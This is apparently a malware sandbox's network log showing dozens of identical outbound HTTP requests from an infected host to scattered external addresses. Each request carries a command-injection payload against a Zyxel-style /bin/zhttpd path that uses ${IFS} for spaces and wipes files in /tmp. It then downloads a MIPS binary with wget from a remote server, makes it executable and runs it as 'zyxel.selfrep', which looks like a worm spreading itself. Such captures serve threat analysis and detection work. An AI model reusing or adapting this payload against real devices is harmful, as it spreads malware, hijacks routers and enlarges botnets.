                                                        Jan 28, 2024 10:12:50.359868050 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3777192.168.2.1452988216.11.152.40443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:50.359899998 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3778192.168.2.1460186165.14.123.239443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:50.359935999 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3779192.168.2.1448194168.64.153.200443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:50.359980106 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3780192.168.2.1444552144.102.142.254443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:50.360019922 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3781192.168.2.144574044.46.200.103443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:50.360059023 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3782192.168.2.1438898218.190.183.204443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:50.360112906 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3783192.168.2.1454958109.89.156.59443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:50.360143900 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3784192.168.2.1458836140.137.9.217443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:50.360198021 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3785192.168.2.1435108141.35.247.228443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:50.360219955 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3786192.168.2.145376662.98.196.120443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:50.360268116 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3787192.168.2.143946053.21.40.166443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:50.360322952 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3788192.168.2.145741813.237.55.49443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:50.360348940 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3789192.168.2.1451754110.89.0.148443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:50.360356092 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3790192.168.2.1434520141.218.59.30443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:50.360398054 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3791192.168.2.145890291.0.176.226443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:50.360421896 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3792192.168.2.1455686179.42.64.169443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:50.360480070 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3793192.168.2.1453132218.234.126.207443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:50.360516071 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3794192.168.2.1454852211.66.160.253443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:50.360557079 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3795192.168.2.1452526140.198.86.8443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:50.360601902 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3796192.168.2.1460170194.125.251.96443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:50.360620022 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3797192.168.2.144426650.253.233.188443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:50.360651016 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3798192.168.2.143359234.156.19.165443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:50.360690117 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3799192.168.2.144228423.226.5.6443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:50.360728025 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3800192.168.2.1439368223.51.212.76443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:50.360775948 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3801192.168.2.1438438220.231.141.59443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:50.360800028 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3802192.168.2.1442558158.102.208.243443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:50.360831976 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3803192.168.2.1456068204.248.53.16443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:50.360877037 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3804192.168.2.143749647.142.190.157443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:50.360903978 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3805192.168.2.1446356160.206.86.161443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:50.360939980 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3806192.168.2.145196479.223.115.234443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:50.360981941 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3807192.168.2.144277696.216.58.80443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:50.361016989 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3808192.168.2.1458322161.164.128.180443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:50.361040115 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3809192.168.2.14575528.61.49.57443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:50.361099005 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3810192.168.2.1454296170.27.30.72443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:50.361134052 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3811192.168.2.144903278.21.207.114443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:50.361166954 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3812192.168.2.1438072203.214.49.166443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:50.361224890 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3813192.168.2.1446288145.136.225.175443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:50.361243010 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3814192.168.2.1448870159.166.219.190443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:50.361275911 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3815192.168.2.1455770113.92.197.229443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:50.361323118 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3816192.168.2.1458132174.46.18.99443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:50.361342907 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3817192.168.2.1442170110.93.191.115443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:50.361382008 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3818192.168.2.1458504136.187.165.65443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:50.361397982 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3819192.168.2.143679481.71.105.98443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:50.361449003 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3820192.168.2.1438060104.134.2.85443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:50.361505032 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3821192.168.2.143630235.248.27.221443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:50.361510038 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3822192.168.2.143620086.181.228.119443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:50.361558914 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3823192.168.2.14587169.159.44.158443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:50.361608028 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3824192.168.2.143574442.248.210.137443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:50.361644983 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3825192.168.2.1454304115.26.210.15443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:50.361686945 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3826192.168.2.1457962138.128.213.124443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:50.361720085 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3827192.168.2.1441788145.102.115.3443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:50.361756086 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3828192.168.2.143385065.58.72.187443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:50.361785889 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3829192.168.2.1441034113.140.215.127443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:50.361819029 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3830192.168.2.1460772126.45.163.240443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:50.361849070 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3831192.168.2.1438734110.8.42.67443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:50.361876965 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3832192.168.2.1438544205.71.227.40443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:50.361934900 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3833192.168.2.143845270.135.249.78443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:50.361973047 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3834192.168.2.1449802176.56.112.188443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:50.362011909 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3835192.168.2.1439350112.92.247.229443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:50.362062931 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3836192.168.2.1460554131.215.154.26443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:50.362093925 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3837192.168.2.1459502121.128.185.226443
                                                        TimestampBytes transferredDirectionData
